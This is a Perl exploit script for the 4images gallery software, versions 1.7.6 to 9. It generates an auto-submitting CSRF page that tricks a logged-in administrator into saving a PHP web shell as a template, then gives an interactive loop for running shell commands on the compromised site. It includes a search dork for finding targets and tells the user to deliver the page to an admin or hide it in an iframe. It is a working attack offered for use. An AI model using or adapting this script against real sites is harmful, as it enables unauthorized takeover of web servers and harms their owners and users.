#!/usr/bin/perl
########################################################################
# Title    : 4images 1.7.6 > 9 Csrf inject php code
# Author   : Or4nG.M4n
# Version  : 1.7.6 > 9
# Homepage : http://www.4homepages.de/
# Dork     : "Powered by 4images"
# video    : http://youtu.be/NYF_zC9hH54
# Thnks~#+----------------------------------+
#        |    xSs m4n   i-Hmx   h311c0d3    |.sp. abo.B4sil
#        |   HcJ Cyb3r ahwak20o0 sa^Dev!L   |.sp. r00ts3c
#        +----------------------------------+
#                       4images 1.7.6 > 9 Csrf inject php code
# vuln : template.php
use LWP::UserAgent;
use LWP::Simple;
system("cls");
print
"
+----------------------------------------+n
| 4images 1.7.6 > 9 csrf inject php code |n
|   Or4nG.M4n  : priv8te@hotmail.com    |n
+----------------------------------------+n
Loading ...n
";
sleep(3);
print "http://tragt & path #";
$h = <STDIN>;
chomp $h;
$html = '<form action="'.$h.'/admin/templates.php" name="csrf" method="post">
<input type="hidden" name="action" value="savetemplate">
<textarea name="content" cols="0" rows="0" >
<?php
$cmd = $_GET["cmd"];
print "n__Code__n";
@system($cmd);
print "n__Code__n";
?>
&lt;/textarea&gt;
<input type="hidden" name="template_file_name" value="inject.php">
<input type="hidden" name="template_folder" value="default">
<script>document.csrf.submit();</script>
</form>';
sleep(2);
print "Createing ...n";
open(XSS , '>>csrf.htm');
print XSS $html;
close(XSS);
print "Createing Done .. n";
sleep(2);
print "Now give csrf.htm to admin or useing iframe coden";
sleep(1);
print "n if you done hit any key to continue";
$continue = <>;
for($ops=0;$ops<15;$ops++)
{
print "
Command# ";
$execut =<STDIN>;
chomp($execut);
$ex = $h."/templates/default/inject.php?cmd=".$execut;
my $content = get $ex;
while($content =~ m{__Code__(.*?)__code__(.*)}g){
print "n [+]Executingnn";
}
print  $content;
}
# The End